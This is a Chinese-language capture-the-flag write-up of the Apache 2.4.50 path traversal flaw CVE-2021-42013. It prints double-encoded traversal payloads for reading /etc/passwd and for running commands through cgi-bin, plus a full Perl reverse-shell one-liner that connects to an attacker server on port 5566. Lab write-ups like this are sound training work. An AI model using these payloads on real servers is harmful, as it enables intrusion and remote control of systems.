Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)

1. 靶机介绍😍

这是一个nday,apache中间件漏洞,比较简单吧,也是首次做这种的夺旗题,蛮有意思的。

2. 开始开始🤔

首先我们进入它给的靶机地址,it work! 十分醒目,记住这个是apache。

我学的只知道具有一个icons目录,可以对这个目录进行路径穿越,访问到敏感文件

因为这里说了,是第一次路径穿越没有严谨,对../进行二次编码即可。

没错,正如我所学的那样,对路径进行穿越😁😁😁😁

payload:

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

我们访问成功了,证实了这个漏洞的存在。接下来对它进行命令执行,看看是否成功 echo;whoami

因为要添加消息体,所以使用POST传参,改一下get就行了

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

然后命令执行成功

接下来就是反弹shell,拿flag的时候了,美滋滋😍😍😍😍。

复制代码
echo;perl -e 'use Socket;$i="服务器IP地址";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

服务器开启监听 5566端口

3. 拿下拿下😏

使用命令反弹shell成功

激动人心的拿flag时候到了,ls发现没有相关文件。

cd 切换上级目录,发现,flag.sh

cat之后自动转换了

回到相关目录拿到flag。

go-flag{9f1fdb2f-2a05-4722-9667-aeea38a65204}

相关推荐
rainFFrain3 小时前
Boost搜索引擎项目(详细思路版)
网络·c++·http·搜索引擎
.Shu.4 小时前
计算机网络 HTTPS 全流程
网络协议·计算机网络·https
还听珊瑚海吗8 小时前
基于WebSocket和SpringBoot聊天项目ChatterBox测试报告
spring boot·websocket·网络协议
猿究院--冯磊11 小时前
计算机网络--HTTP协议
网络协议·计算机网络·http
元清加油13 小时前
【Goland】:协程和通道
服务器·开发语言·后端·网络协议·golang
让代码飞~13 小时前
idea进阶技能掌握, 使用自带HTTP测试工具,完全可替代PostMan
java·http·intellij-idea·postman
iナナ1 天前
传输层协议——UDP和TCP
网络·网络协议·tcp/ip·udp
舒一笑1 天前
Mac 上安装并使用 frpc(FRP 内网穿透客户端)指南
后端·网络协议·程序员
Mr_Xuhhh1 天前
NAT、代理服务、内网穿透
网络·网络协议·http·https·udp·智能路由器
用户84913717547161 天前
为什么大模型都离不开SSE?带你搞懂第1章〈SSE技术基础与原理〉
前端·网络协议·llm